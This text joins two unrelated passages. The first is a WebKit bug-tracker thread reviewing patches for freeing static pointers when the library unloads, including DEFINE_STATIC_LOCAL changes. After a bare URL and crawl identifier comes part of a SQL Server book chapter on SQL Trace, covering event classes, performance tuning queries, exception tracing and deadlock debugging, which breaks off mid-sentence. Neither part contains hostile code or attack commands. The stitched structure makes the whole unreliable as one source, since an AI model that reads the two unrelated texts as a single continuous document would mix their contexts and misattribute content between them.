really needed. > +// Wrapper class for arrays, which assigned to a static variable > +// By default, it behaves like a simple C++ array without performance overhead These comments need periods. The comment leaves out what really matters, which is what this class is for! It says that by default it works as a simple array, but what does it do when not default? > + delete[] reinterpret_cast<LocalStaticArrayPtr<T>*>(ptr)->m_ptr; This should be static_cast. > + while (current) { > + // Some pointers (i.e: HashTableDeleter) frees themself "Some pointers free themselves." would be correct grammar. The Latin abbreviation "i.e." means "in other words". I think you mean "for example" here and that should be written either as "for example" or as "e.g." if you want to use the Latin abbreviation. The comment is *almost* helpful, but is just a bit too obscure. The comment needs to be more explicit and say clearly that we follow the next pointer before calling free because in some cases the free function will delete the item including the next pointer. > + ptr->m_free(reinterpret_cast<void*>(ptr)); There is no need for this cast at all. > + // Perhaps a double linked list may be suitable if remove() called frequently This is a confusing comment, because it does not say what the tradeoff is. Why aren't we using a doubly-linked list now? I suggest we not even include the remove() function unless we need it. And if we need it we should have the doubly-linked list from the start, unless there's a clear reason we should not. > + StaticPtrBase* current = head(); > + if (current == this) { > + m_head = current->next(); > + return; > + } > + > + while (current->next() != this) { > + current = current->next(); > + ASSERT(current); > + } > + current->m_next = next(); > +} It's a little strange to use next() to get the pointer and then m_next to set it. There's no abstraction there, just slight confusion, by having some of each. There are cleaner ways to write the linked list algorithms that require fewer special cases and don't fetch current->next() multiple times, but this is probably OK as-is. > + // Methods > + void append(); > + void remove(); This comment is not good. First of all, "methods" is not a C++ term, and second, what does that comment add? > + static StaticPtrBase* m_head; > + StaticPtrBase* m_next; > + StaticPtrBaseFree m_free; > + > + static inline StaticPtrBase* head() { return m_head; } > + inline StaticPtrBase* next() { return m_next; } The use of inline here does no good -- functions defined inside a C++ class are always treated as if they had "inline" specified, so there's no point in saying it explicitly. It doesn't make sense to have both public data members and public function members that get at that same data. Either the data should be private, or the functions should be omitted. > +#if !PLATFORM(QT) > delete data; > +#endif Why is Qt a special case here? This is very confusing! > --- a/WebCore/WebCore.pro > +++ b/WebCore/WebCore.pro > @@ -1044,6 +1044,7 @@ SOURCES += \ > html/HTMLViewSourceDocument.cpp \ > html/ImageData.cpp \ > html/PreloadScanner.cpp \ > + html/TimeRanges.cpp \ > html/ValidityState.cpp \ > inspector/ConsoleMessage.cpp \ > inspector/InspectorBackend.cpp \ > @@ -2629,7 +2630,6 @@ contains(DEFINES, ENABLE_VIDEO=1) { > html/HTMLMediaElement.cpp \ > html/HTMLSourceElement.cpp \ > html/HTMLVideoElement.cpp \ > - html/TimeRanges.cpp \ > platform/graphics/MediaPlayer.cpp \ > rendering/MediaControlElements.cpp \ > rendering/RenderVideo.cpp \ Can you make the above change in a separate check-in first? > +#if !ENABLE(FREE_STATIC_PTRS) > ~IdentifierRep() > { > // IdentifierReps should never be deleted. > ASSERT_NOT_REACHED(); > } > +#endif This is a good example of something that's probably wrong. I think there is storage to be freed here. Simply changing things so it compiles means that we have a storage leak in the FREE_STATIC_PTRS case. This patch is way too big, doing too much at once. It is easy to miss mistakes like this in a patch of this size. > static PassRefPtr<CSSInitialValue> createExplicit() > { > - static CSSInitialValue* explicitValue = new CSSInitialValue(false); > - return explicitValue; > + DEFINE_STATIC_LOCAL(CSSInitialValue, explicitValue, (false)); > + return &explicitValue; > } > static PassRefPtr<CSSInitialValue> createImplicit() > { > - static CSSInitialValue* explicitValue = new CSSInitialValue(true); > - return explicitValue; > + DEFINE_STATIC_LOCAL(CSSInitialValue, explicitValue, (true)); > + return &explicitValue; > } These kinds of changes should go in first, in a separate patch. > - delete defaultStyle; > - delete simpleDefaultStyleSheet; > + defaultStyle.deletePtr(); > + simpleDefaultStyleSheet.deletePtr(); > defaultStyle = new CSSRuleSet; > simpleDefaultStyleSheet = 0; This is a bad idiom. The global pointer is a variation on OwnPtr, and the right idiom there is to delete things automatically when assigning a new value. Having an explicit deletePtr makes it too easy to use it wrong. It's extremely important to have a patch that creates the mechanism separate from a patch that deploys it in so many places. By making a single large patch you're making it very hard to review, and there are lots of things you will have to change now based on my feedback. I can't read the rest of this right now. *** Bug 30408 has been marked as a duplicate of this bug. *** I believe that the value of being able to clean up static pointers goes well beyond reporting memory leaks. There are operating systems that run on embedded devices that use WebKit that run all applications in one process space. They unload the WebKit library, but any unfreed memory is leaked until the device is reset. On these devices snapshots of WebKit have been customized to free these pointers. It would be nice to have this code merged to the trunk. There are applications that host various WebKit based WebWidgets that are created and destroyed without the application quitting. For this class of applications deleting the static pointers on library unload is important. Next, there is the case described in an earlier comment of resetting the state of WebKit. Also, I believe that the proposal suggested earlier by somebody to run all destructors before actually freeing the static allocations should take care of circular references and delete order despite the fact that in a well designed class architecture delete order of global objects should be irrelevant. I am not saying that the default Mac build or even any platform's default build should be affected in any way by these changes, but one should have the option to make a build that supports a clean uninitialization. Whenever something is built without provisions for clean tearing down sooner or later problems will appear (think nuclear plants and nuclear waste). Created attachment 41886 [details] Proposed Partial Patch This topic appears to be pretty controversial. It appears that there is not much value at least for the Mac version of WebKit in making WebKit clean up its singletons before it being unloaded. Since a large change appears to be expensive in terms of development and review time, and risky enough to be found unjustifiable for Apple, I propose this small safe change, that does not solve the whole problem, but can constitute a first step towards solving the problem. My final goal is to have global resources (such as cashes, custom memory management maps, default stylesheets, etc.) implemented in such a way that after the last WebKit page, frame, document, script object, worker thread, etc. has been deleted, these resources can be freed in any order, thus they can be implemented as global variables, or via global smart pointers, etc. if one wanted to. I plan to provide macros for declaring and defining these global resources. I also plan that by default these macros shall expand to pretty much the same code as it is now used for the resources such that there is no impact on performance. In the absence of any other value, this current patch provides: 1. No impact on performance if the user does not redefine the DEFINE_STATIC_LOCAL macro. 2. A slightly smaller, more consistent yet more configurable WebKit source code which benefits future maintainability and usability. I believe that on the basis of the above benefits alone, my patch should be accepted, regardless of whether I manage to find a solution to the underlying problem of singleton cleanup. Comment on attachment 41886 [details] Proposed Partial Patch It seems fine to use DEFINE_STATIC_LOCAL in one more place. And since that's all the patch does, we don't have to have any deep debate about it. It also seems OK to allow a version of DEFINE_STATIC_LOCAL defined elsewhere to override the version in StdLibExtras.h, but I don't see any reason the two need to be done in a single patch. > +#ifndef DEFINE_STATIC_LOCAL > #if COMPILER(GCC) && defined(__APPLE_CC__) && __GNUC__ == 4 && __GNUC_MINOR__ == 0 && __GNUC_PATCHLEVEL__ == 1 > #define DEFINE_STATIC_LOCAL(type, name, arguments) \ > static type* name##Ptr = new type arguments; \ > @@ -40,7 +41,7 @@ > #define DEFINE_STATIC_LOCAL(type, name, arguments) \ > static type& name = *new type arguments > #endif > - > +#endif > // OBJECT_OFFSETOF: Like the C++ offsetof macro, but you can use it with classes. > // The magic number 0x4000 is insignificant. We use it to avoid using NULL, since > // NULL can cause compiler problems, especially in cases of multiple inheritance. You should move the #endif here so that there's still a blank line before OBJECT_OFFSETOF. > + * platform/ThreadGlobalData.cpp: > + (WebCore::threadGlobalData): > + Allocated threadGlobalData statically, not on heap such that it > + will be destroyed when the library is unloaded. I do not think the comment here is clear. My comment would be something more like, "Use DEFINE_STATIC_LOCAL macro instead of doing a one-offer version here. Helpful because we are using DEFINE_STATIC_LOCAL to experiment with unloading the library and deallocating memory". I think these patches are OK, but the change log should talk about what they do rather than saying these give WebKit ability to free memory when unloading. That's a big project that this patch is only a tiny part of. review- because of the minor problem with #endif and because the change log could be a lot clearer, but the patch seems fine otherwise Created attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL Per Darin's comment, I split my patch in 2 and I placed the appropriate comment in the ChangeLog. I apologize for my carelessness in the previous patch proposal which had unrelated comments in the ChangeLog as a result of reusing the log from a previous more substantial attempt. Comment on attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL So can DEFINE_STATIC_LOCAL still eventually be removed once we no longer support this broken version of Apple's GCC? Or does this new usage make us forever dependent on this macro? (In reply to comment #43) > So can DEFINE_STATIC_LOCAL still eventually be removed once we no longer > support this broken version of Apple's GCC? Or does this new usage make us > forever dependent on this macro? I don't think removing DEFINE_STATIC_LOCAL is a good idea, regardless of this new usage. It's true that we use it to work around a GCC bug. But we also use it to make indicate the idiom of using a local variable in a way that avoids static destructors. It's better to that than to handwrite the idiom each time. We might want to rename it, but it seems unlikely we'd want to remove it. Comment on attachment 41972 [details] Allowing for override of DEFINE_STATIC_LOCAL Clearing flags on attachment: 41972 Committed r50171: <> All reviewed patches have been landed. Closing bug. i think carol's landed patch is a small part of the big thing here (?) or zoltan's implementation showed up itself as unfeasible and was "dropped" (and i missed it in the bug comments) ? commitbot landed and closed the bug by accident then if so (?) ps: sorry for bug spamming Definitely so, reopening. We try to use one change per bug. It would be better to create a new "meta bug" and if there are multipel changes, do those in individual bugs blockign the meta bug. There is a lot of discussion in this bug, better not start over, in my opinion.
https://bugs.webkit.org/show_bug.cgi?id=27980
CC-MAIN-2018-22
refinedweb
6,280
64.41
Rooting RouterOS with a USB Drive Putting CVE-2019–15055 to Work I was avoiding writing a blog about scanning a few million MikroTik routers when I noticed MikroTik patched a vulnerability. It caught my attention because, initially, only 6.46beta34 received a patch. A patch for Stable was released after I wrote this blog and a patch for Long-term is still pending. I wasn’t the only one to notice the vulnerability either. The 6.46beta34 release notes contain this line: “system — accept only valid string for “name” parameter in “disk” menu (CVE-2019–15055);” A quick diff of /nova/bin/diskd yielded a simple patch. The patch adds two comparisons that can branch to the “bad name” error message. The patch specifically looks for the ‘.’ and ‘/’ characters in a string. The reader can safely assume that this logic filters the name assigned to a mounted disk. Pictured below, I’ve inserted a USB drive into my MikroTik router. The drive gets auto-assigned the name disk1, but an authenticated user can assign whatever they’d like. The disk name isn’t purely cosmetic. It’s used in the drive’s file path. Filtering ‘.’ and ‘/’ from the name makes sense to defeat directory traversal vulnerabilities. I actually got really excited here and changed the drive’s name to ../../../../../etc/, but that didn’t do anything. When I looked deeper into how the disk name was used internally, I quickly found the name being used to create symlinks. Specifically, RouterOS will create two symlinks. One in /rw/media/ and one in /rw/pckg/. From the image, you can see the user doesn’t control the symlink’s destination. Inevitably, no matter the name of the symlink, it will always point to /ram/disk%u (aka the USB’s file system). Cool. Patch analysis is fun. But how’s this exploitable? After finally googling the CVE, like I should have done in the beginning, I found that FortiGuard Labs discovered this vulnerability and disclosed it on August 23rd. They state, “Successful exploitation of this vulnerability would allow a remote authenticated attacker to delete arbitrary file [sic] on the system, which could lead to privilege escalation.” RouterOS is mostly read-only. There are only a couple of interesting files that can actually be deleted. For example, you could delete /rw/store/user.dat and, after a reboot, the “admin” user will revert back to a blank password. Here’s a quick proof of concept video: MikroTik’s forum post, pictured at the beginning of this blog, is kind of right though. Resetting the user accounts when you already have a valid account isn’t that exciting. But that isn’t all CVE-2019–15055 can do. In fact, I’m about to show you how to use it to get a root shell. If you read my previous blog, RouterOS Post Exploitation, you might recall that I was able to get RouterOS’s SNMP binary to load a shared object by storing it in /pckg/snmp_xploit/nova/lib/snmp/. This works because the SNMP process loops over all the directories in /pckg/ looking for shared objects to dlopen(). We can do the exact same thing here using CVE-2019–15055 and the USB’s file system. This blog’s victim is a MikroTik hAP. This little guy features a USB port and it uses RouterOS MIPSBE. We’ll need to cross-compile the malicious shared object to MIPS big endian. What shared object? This one: #include <unistd.h> #include <stdlib.h>void __attribute__((constructor)) lol(void) { int fork_result = fork(); if (fork_result == 0) { execl("/bin/bash", "bash", "-c", "mkdir /pckg/option; mount -o bind /boot/ /pckg/option", (char *) 0); exit(0); } }extern void autorun(void) { // do nothin' I guess? return; } This code is very simple. The lol() function will be invoked when the SNMP binary calls dlopen() on the shared object. The function itself creates the directory /pckg/option and mounts /boot to it. Seems a bit odd, but this will enable a backdoor that allows the devel user to telnet or ssh to a root busybox shell. Compiling the shared object and preparing the USB drive is straightforward: albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -c -fpic snmp_exec.c albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -shared -s -o lol_mips.so snmp_exec.o albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ mkdir -p /media/albinolobster/B463-D645/nova/lib/snmp/ albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ cp lol_mips.so /media/albinolobster/B463-D645/nova/lib/snmp/ As discussed earlier, the malicious USB is initially mounted as disk%u. Pop over to System → Disk and change the drive’s name from disk1 to ../../../ram/pckg/snmp_xploit. Under the hood, you can see that the snmp_xploit directory can now be found in /pckg/. Next head over to IP → SNMP and either enable SNMP or restart it. This will cause SNMP to load the shared object off of the USB drive. The developer backdoor should get enabled almost immediately. Once logged in through the backdoor as root, you can see the shared object loaded into SNMP’s memory. A proof of concept video follows: Remember, this vulnerability remains unfixed in RouterOS Long-term. While the attack does require authentication, RouterOS ships with default credentials and a couple of the interfaces are vulnerable to brute-forcing. And, of course, insider threats are very real. Especially with a high-value target like an ISP router. Finally, Tenable’s disclosure policy states that releasing a patch is disclosure. Figuring out what the release candidate patch did was trivial. And if I can do it, anyone can. You need to release patches for all affected versions.
https://medium.com/tenable-techblog/rooting-routeros-with-a-usb-drive-16d7b8665f90
CC-MAIN-2019-39
refinedweb
956
58.58
Troubleshooting and Analysis with Traces The goal of SQL Trace is to help you—presumably, a DBA or database developer—analyze your system in order to either detect or solve problems. As SQL Server is such a large and complex product, using SQL Trace without knowing exactly what you want to do can sometimes feel like trying to find the proverbial needle in a very large haystack. In this section, we’ll try to distill some of the lessons we’ve learned from doing countless traces into a solid framework upon which you can build your own tracing skill. I’ll start with an overview of those event classes that we use most often, after which we’ll drill into some common scenarios for which SQL Trace can helps in your day-to-day work. Commonly Used SQL Trace Event Classes With over 170 events to choose from, the Profiler Events Selection dialog can be a bit daunting to new users. Luckily for your sanity, most of these events are not commonly used in day-today tracing activity, and are provided more for the sake of automated tools. In this section, we will describe the most common events that we use in our work. - Errors and Warnings:Attention This event is usually fired when a client disconnects from SQL Server unexpectedly. The most common cause of this is a client library time-out, which is generally a 30-second timer that starts the moment a query is submitted. If queries are timing out, it’s something you want to know about immediately, so this event is used frequently. - Errors and Warnings:Exception and Errors and Warnings:User Error Message Exceptions and user error messages go hand-in-hand, and we always trace these two classes together. When a user exception occurs, both events will be fired. The Exception event will include the error number, severity, and state, whereas the User Error Message event will include the actual text of the error. We discuss these events in detail in the section “Identifying Exceptions” later in this chapter. - Locks:Deadlock Graph and Locks:Lock:Deadlock Chain In previous versions of SQL Server, deadlocks could only be identified through the slightly obscure Deadlock Chain event. SQL Server 2005 introduces the much more usable Deadlock Graph event, which produces standard XML that Profiler is able to render into a very nice graphical output. We’ll discuss this output in the “Debugging Deadlocks” section later in this chapter. - Locks:Lock:Acquired, Locks:Lock:Released, and Locks:Lock:Escalation We use these events mainly in conjunction with working on deadlocks. They provide insight into what locks SQL Server takes during the course of a transaction, and for how long they are held. . These events can be also very interesting to monitor if you’re curious about how SQL Server’s various isolation levels behave. Make sure, when using these events, to filter on a specific spid that you’re targeting, lest you get back far too much information to process. - Performance:Showplan XML Statistics Profile This event can be used to capture XML showplan output for queries that have run on the server you’re profiling. There are actually several different showplan and XML showplan event classes, but this one is the most useful, in our opinion, as it includes actual rowcounts and other statistics data, which can help when tuning queries. This event class will be discussed in more detail in the “Performance Tuning” section. - Security Audit (Event Category) Although this isn’t an event class—but rather, a category that includes many event classes—we thought it belonged in this list because it contains a number of useful event classes to help you monitor virtually all security-related activity as it occurs on your server. This includes such information as failed logins attempts (Audit Login Failed event class), access to specific tables or other objects (Audit Schema Object Access Event event class), and even when the server is restarted (Audit Server Starts and Stops event class). Most of these event classes are designed for SQL Server’s built-in server auditing traces, described in the “Auditing: SQL Server’s Built-in Traces” section at the end of this chapter. - Security Audit:Audit Login and Security Audit:Audit Logout We specifically singled these two events out of the overall Security Audit category because they are the two events in that category that we find useful on a day-to-day basis, especially when doing performance tuning. By monitoring these events along with various query events in the Stored Procedures and TSQL category, you can more easily aggregate based on a single session. Tip Thanks to a change in SQL Server 2005 SP2, these events now fire even for pooled logins and logouts, making them even more useful than before. To detect whether or not the event fired based on a pooled connection, look for a value of 2 in the EventSubClass column. - Stored Procedures:RPC:Starting and Stored Procedures:RPC:Completed These events fire when a remote procedure call (RPC; generally, a parameterized query or stored procedure call, depending on the connection library you’re using) is executed by a client application. - TSQL:SQL:BatchStarting and TSQL:SQL:BatchCompleted These events fire when an ad hoc batch is executed by a client application. Using these in combination with the RPC event classes will allow you to capture all requests submitted to the server by external callers. Both the BatchCompleted event class and the corresponding RPC:Completed event class populate four key columns: Duration, Reads, Writes, and CPU. We discuss these in more detail in the “Performance Tuning” section later in this chapter. - Stored Procedures:SP:StmtStarting and Stored Procedures:SP:StmtCompleted Sometimes it can be difficult to determine which access path was taken in a complex stored procedure full of flow control statements. These events are fired every time a statement in a stored procedure is executed, giving you a full picture of what took place. Note that these events can produce an extremely large amount of data. It is, therefore, best to use them only when you’ve filtered the trace by either a given spid you’re tracking, or a certain stored procedure’s name or object ID (using the ObjectName or ObjectId columns, respectively) that you’re interested in. - Stored Procedures:SP:Recompile Stored procedure recompiles are commonly cited as a potential SQL Server performance problem. SQL Server includes a counter to help track them (SQLServer:SQL Statis-tics:SQL Re-Compilations/Sec), and if you see a consistently high value for this counter you may consider profiling using this event class in order to determine which stored procedures are causing the problem. Note For more information on avoiding recompiles see Chapter 5, “Plan Caching and Recompilation.” - Stored Procedures:SP:Starting This event class fires whenever a stored procedure or function is called—no matter whether it is called directly by a client, or nested within another stored procedure or function. Since it does not populate the Reads, Writes, or CPU columns, this event class is not especially useful for performance tuning, but it does have its value. We use this class often for obtaining simple counts of the number of times a specific stored procedure was called within a given interval, and also for situations in which stored procedure calls are heavily nested and we need to determine exactly in which sequence calls were made that resulted in a certain procedure getting executed. - Transactions:SQLTransaction This event can be used to monitor transaction starts, commits, and rollbacks. You can determine which state the transaction is in by looking at the EventSubClass column, which will have a value of 0, 1, or 2 for a transaction starting, committing, or rolling back, respectively. Note that because every data modification uses a transaction, this event can cause a huge amount of data to be returned on a busy server. If possible, make sure to filter your trace based on a specific spid that you’re tracking. - User Configurable (Event Category) This event category contains 10 events, named UserConfigurable:0 through UserConfig-urable:9. These events can be fired by users or modules with sufficient ALTER TRACE access rights, allowing custom data to be traced. We discuss some possibilities in the “Stored Procedure Debugging” section of this chapter. Performance Tuning Performance is always a hot topic, and for a good reason; in today’s competitive business landscape, if your users feel that your application is too slow they’ll simply move on to a different provider. In order to help you prevent this from happening, SQL Trace comes loaded with several event classes that you can harness in order to find and debug performance bottlenecks. Note Performance monitoring is an art unto itself, and a complete methodology is outside the scope of this chapter; in this chapter, we’ll stick with only what you can do using SQL Trace. Different aspects of troubleshooting for performance are discussed throughout this book. In addition, for a comprehensive discussion on the topic of how to think about SQL Server performance, please refer to Inside SQL Server 2005: T-SQL Querying (Microsoft Press, 2006). Performance monitoring techniques can be roughly grouped into two categories: those you use when you already know something about the problem, and those you use to find out what the problem is (or find out if there even is a problem). These categories tend to dovetail nicely; once you’ve found out something about the problem, you can start heading in the direction of getting more information. Therefore, let’s start with the second technique, helping to pinpoint problem areas, and then move into how to conduct a more detailed analysis. When walking into a new database performance tuning project, the very first thing we want to find out is what queries make up the “low-hanging fruit.” In other words, we want to identify the worst performance offenders, as these are the ones that can give us the biggest tuning gains. It’s important at this stage to not trace too much information, so we generally start with only the Stored Procedures:RPC:Completed and TSQL:SQL:BatchCompleted events. These events are both selected in the TSQL_Duration template that ships with SQL Server Profiler. We recommend adding the Reads, Writes, and CPU columns for both events, which are not selected by default in the template, in order to get a more complete picture. We also recommend selecting the TextData column rather than the (default) BinaryData column for the RPC:Completed event—this will make it easier to work with the data later. A properly specified set of events is shown in Figure 2-13. Figure 2-13 Selected events/columns for an initial performance audit Once you’ve selected the events, set a filter on the Duration column for a small number of milliseconds. Most of the active OLTP systems we’ve worked with have an extremely large number of zero-millisecond queries, and these are clearly not the worst offenders in terms of easy-to-fix performance bottlenecks. We generally start with the filter set to 100 milliseconds, and work our way up from there. The idea is to increase the signal-to-noise ratio on each iteration, eliminating “smaller” queries and keeping only those that have a high potential for performance tuning. Depending on the application, we generally run each iterative trace for 10 to 15 minutes, depending on server load, then take a look at the results and increase the number appropriately until we net only a few hundred events over the course of the trace. Note that the 10- to 15-minute figure may be too high for some extremely busy applications. See the “Traceing Considerations and Design” section later in this chapter for more information. The other option is to run only the initial trace, and then filter the results down from there. A simple way to handle that is with SQL Server 2005’s NTILE windowing function, which divides the input rows into an equal number of “buckets.” To see only the top 10 percent of queries in a trace table, based on duration, use the following query: Note The execution by an application of an extremely large number of seemingly small—even zero-millisecond—queries can also be a performance problem, but it generally has to be solved architecturally, by removing chatty interfaces, rather than via Transact-SQL query tuning. Profiling to find these kinds of issues can also be incredibly difficult without knowledge of exactly what a particular application is doing, so we will not cover it here. If you find that it is difficult to get the number of events returned to a manageable level—a common problem with very busy systems—you may have to do some tweaking of the results to group the output a bit better. The results you get back from SQL Trace will include raw text data for each query, including whichever actual arguments were used. To analyze the results further, the data should be loaded into a table in a database, then aggregated, for example, to find average duration or number of logical reads. The problem is doing this aggregation successfully on the raw text data returned by the SQL Trace results. The actual arguments are good to know—they’re useful for reproducing performance issues—but when trying to figure out which queries should be tackled first we find that it’s better to aggregate the results by query “form.” For example, the following two queries are of the same form—they use the same table and columns, and only differ in the argument used for the WHERE clause—but because their text is different it would be impossible to group them as-is: SELECT * FROM SomeTable WHERE SomeColumn = 1 --- SELECT * FROM SomeTable WHERE SomeColumn = 2 To help solve this problem, and reduce these queries to a common form that can be grouped, Itzik Ben-Gan provided a CLR UDF in <msl_i>Inside SQL Server 2005: T-SQL Querying</msl_i>, a slightly modified version of which—that also handles NULLs—follows: [Microsoft.SqlServer.Server.SqlFunction(IsDeterministic=true)] public static SqlString sqlsig(SqlString querystring) { return (SqlString)Regex.Replace( querystring.Value, @”([\s,(=<>!](?![^\]]+[\]]))(?:(?:(?:(?:(?# expression coming )(?:([N])?(')(?:[^']|'')*('))(?# character )|(?:0x[\da-fA-F]*)(?# binary )|(?:[-+]?(?:(?:[\d]*\.[\d]*|[\d]+)(?# precise number )(?:[eE]?[\d]*)))(?# imprecise number )|(?:[~]?[-+]?(?:[\d]+))(?# integer )|(?:[nN][uU][lL][lL])(?# null ))(?:[\s]?[\+\-\*\/\%\&\|\^][\s]?)?)+(?# operator )))”, @”$1$2$3#$4”); } This UDF finds most values that “look” like arguments, replacing them with a “#”. After processing both of the preceding queries with the UDF, the output would be the same: To use this UDF to help with processing a trace table to find the top queries, you might start with something along the lines of the following query, which groups each common query form and finds average values for Duration, Reads, Writes, and CPU: From here you can further filter by the average values in order to find those queries to which you’d like to dedicate a bit more attention. Once you have decided upon one or more queries to tune, you can use SQL Trace to help with further analysis. For example, suppose that you had isolated the following stored procedure, which can be created in the AdventureWorks database, as a culprit: To begin a session to analyze what this stored procedure is doing, first open a new query window in SQL Server Management Studio, and get the spid of your session using the @@SPID function. Next, open SQL Server Profiler, connect to your server, and select the Tuning template. This template adds SP:StmtCompleted to the combination of events used to get a more general picture of server activity. This will result in a lot more data returned per call, so use the spid you collected before to filter your trace. You also might wish to add the Showplan XML Statistics Profile event, in order to pull back query plans along with the rest of the information about your query. Figure 2-14 shows a completed Events Selection screen for this kind of work. Note Adding a Showplan XML or Deadlock Graph event causes an additional tab to open in the Trace Properties dialog, called Events Extraction Settings. This tab contains options for automatically saving any collected query plans or deadlock graph XML to text files, in case you need to reuse them later. Next, go ahead and start the trace in SQL Server Profiler. Although we generally use server-side traces for most performance monitoring, the amount of overhead that Profiler brings to the table when working with a single spid to process a single query is small enough that we don’t mind harnessing the power of the UI for this kind of work. Figure 2-15 shows the Profiler output on our end after starting the trace and running the query for @EmployeeID=21. We have selected one of the Showplan XML events in order to highlight the power of this feature; along with each statement executed by the outermost stored procedure and any stored procedures it calls, you can see a full graphical query plan, all in the Profiler UI. This makes it an ideal assistant for helping you tune complex, multilayered stored procedures. SQL Trace will not actually tune for you, but it will help you to find out not only which queries are likely to be causing problems, but also which components of those queries need work. However, performance tuning is far from the only thing that it can be used for. In the next section, we’ll explore another problem area—exceptions—and how to use SQL Trace to help in tracking them down. Figure 2-14 Trace set up for performance profiling of a single spid’s workload Figure 2-15 Using Profiler to trace batches, statements, and query plans Note Saying that SQL Trace will not actually tune for you is only mostly correct. SQL Server’s Database Engine Tuning Advisor (DTA) tool can take trace files as an input, in order to help recommend indexes, statistics, and partitions to make your queries run more quickly. If you do use the DTA tool, make sure to feed it with a large enough sample of the queries your system generally handles. Too small a collection size will skew the results, potentially causing the DTA to make subpar recommendations, or even produce suggestions that cause performance problems for other queries that weren’t in the input set. Identifying Exceptions In a perfect world, all exceptions would be caught, handled, and logged. Appropriate personnel would regularly watch the logs and create bug reports based on the exceptions that occurred, such that they could be debugged in a timely manner and avoided in the future. But alas, the world is far from perfect, and it is quite common to see applications that regularly bubble exceptions all the way from the database to the user interface, with no logging of any kind. Or, worse, applications that catch and swallow exceptions, resulting in no one ever knowing that they occurred, yet occasionally resulting in strange data returned to users who aren’t quite sure what’s going on. In order to find out when either of these scenarios is happening, we often take a proactive approach and watch for exceptions so that we can find and fix them—hopefully before they frustrate too many users. Tracing for exceptions is fairly simple; you can start with the TSQL template, which includes the Audit Login and Audit Logout events, as well as the ExistingConnection event—all of which can be removed for this exercise. Left are RPC:Starting and SQL:BatchStarting, both of which are needed in order to trace the Transact-SQL that caused an exception, whether it occurred as the result of an SQL batch or RPC call. It’s important to trace for the Starting rather than Completed events in this case, because certain errors can result in the Completed event not firing for a given query. To the RPC and SQL events, add the Attention, Exception, and User Error Message events from the Errors and Warnings category. The Attention event fires whenever a client forcibly disconnects–the best example of which is a client-side query time-out. These are good to know about, and usually indicate performance or blocking issues. The Exception event fires whenever an exception of any kind occurs, whereas the User Error Message event fires either in conjunction with an exception—to send back additional data about what occurred, in the form of a message—or whenever a variety of statuses change, such as a user switching from one database to another. We also recommend adding the EventSequence column for each selected event class. This will make querying the data later much easier. Figure 2-16 shows a completed Events Selection dialog box for the events and columns that we recommend for exception monitoring. Note SQL Server uses exceptions internally to send itself messages during various phases of the query execution process. A telltale sign of this is an Exception event with no corresponding User Error Message event. Should you see such a situation, do not be alarmed; it’s not actually an error meant for you to consume. Once you’ve selected the appropriate events, script the trace and start it. This is the kind of trace you may want to run in the background for a while, doing occasional collections. See the “Traceing Considerations and Design” section for more information. Generally, you may find it interesting to collect this data during fairly busy periods of activity, in order to find out what exceptions your users may be experiencing. Since this kind of tracing is more like casting a net and hoping to catch something than a hunt for something specific, timing is of the essence. You may or may not see an exception, but just because you don’t see one during one collection period doesn’t mean they aren’t happening; make sure to monitor often. Figure 2-16 Events Selection used for tracing to discover exceptions and disconnections Once you’ve captured your data and transferred it into a table, reporting on which exceptions occurred is a matter of finding: - All Attention events (EventClass 16) and the Transact-SQL or RPC event (EventClass 13 and 10, respectively) on the same spid that preceded the disconnection. - All Exception events (EventClass 33) immediately followed by a User Error Message event (EventClass 162), and the Transact-SQL or RPC event on the same spid that preceded the exception. All logic for following and preceding can be coded using the EventSequence column, which is why we recommend including it in this trace. The following query uses this logic to find all user exceptions and disconnections, related error messages where appropriate, and the queries that caused the problems: ;WITH Exceptions AS ( SELECT T0.SPID, T0.EventSequence, COALESCE(T0.TextData, 'Attention') AS Exception, T1.TextData AS MessageText FROM TraceTable T0 LEFT OUTER JOIN TraceTable T1 ON T1.EventSequence = T0.EventSequence + 1 AND T1.EventClass = 162 WHERE T0.EventClass IN (16, 33) AND (T0.EventClass = 16 OR T1.EventSequence IS NOT NULL) ) SELECT * FROM Exceptions CROSS APPLY ( SELECT TOP(1) TextData AS QueryText FROM TraceTable Queries WHERE Queries.SPID = Exceptions.SPID AND Queries.EventSequence < Exceptions.EventSequence AND Queries.EventClass IN (10, 13) ORDER BY EventSequence DESC ) p If you’ve collected a large number of events, you can greatly improve the performance of this query by creating a clustered index on the trace table, on the EventSequence column. Tip If you’re aware of an exception condition that occurs when a certain stored procedure is called, but you need more information on what sequence of events causes it to fire, you might work with the same events detailed in the preceding section, for performance tuning of a single query. Switch the query events shown in that section from Completed to the corresponding Starting classes, and add the Exception and User Error Message events. Much like with the tuning of a single query example, this is something you should run directly in SQL Server Profiler, with a filter on the spid from which you’re working. Debugging Deadlocks Tracking general exceptions is a good thing, but every DBA knows the horrors of dealing with a certain type exception: message number 1205, severity 13, familiarly known as deadlocks. Deadlock conditions are difficult to deal with because it often feels like you just don’t get enough data from the server to help you figure out exactly what happened and why. Even the error message returned by the server is somewhat hopeless; the only suggestion made in the message is that you might “rerun the transaction.” SQL Trace has long exposed tools to help with isolating and debugging deadlock conditions, but SQL Server 2005 takes these to the next level, providing a very useful graphical interface to help you resolve these nasty issues. To illustrate what is available, we’ll show you how to force a deadlock in the tempdb database. Start with the following code: By starting two separate transactions and staggering updates to the rows in the opposite order, we can make a deadlock occur and observe how SQL Trace can help with debugging. Note The following example assumes that you have already identified the two stored procedures or queries involved in causing the deadlock, either based on an exception trace as shown in the preceding section, or by enabling trace flag 1222 at the server level (add –T1222 to the startup parameters for the SQL Server service) and collecting the deadlocking resources from the SQL Server error log. Once you have identified the participating queries, conduct the actual research on a development instance of SQL Server on which you’ve restored the production data. Debugging deadlocks can require collecting a lot of data, and because some of the events are fired by system spids it can be impossible to filter the trace so that you only collect relevant data. On a busy system this trace will create a very large amount of load, so we recommend always working offline. To begin with, open two query windows in SQL Server Management Studio, and collect their spids using @@SPID. You may want to use these spids later to help with analysis of the collected trace data. Start a new SQL Server Profiler session and use the TSQL template to select the RPC:Starting and SQL:BatchStarting events. To these, add the Deadlock graph, Lock:Acquired, Lock:Escalation, and Lock:Released events, all from the Locks category. The Lock events will help you analyze the sequence of locks taken to contribute to the 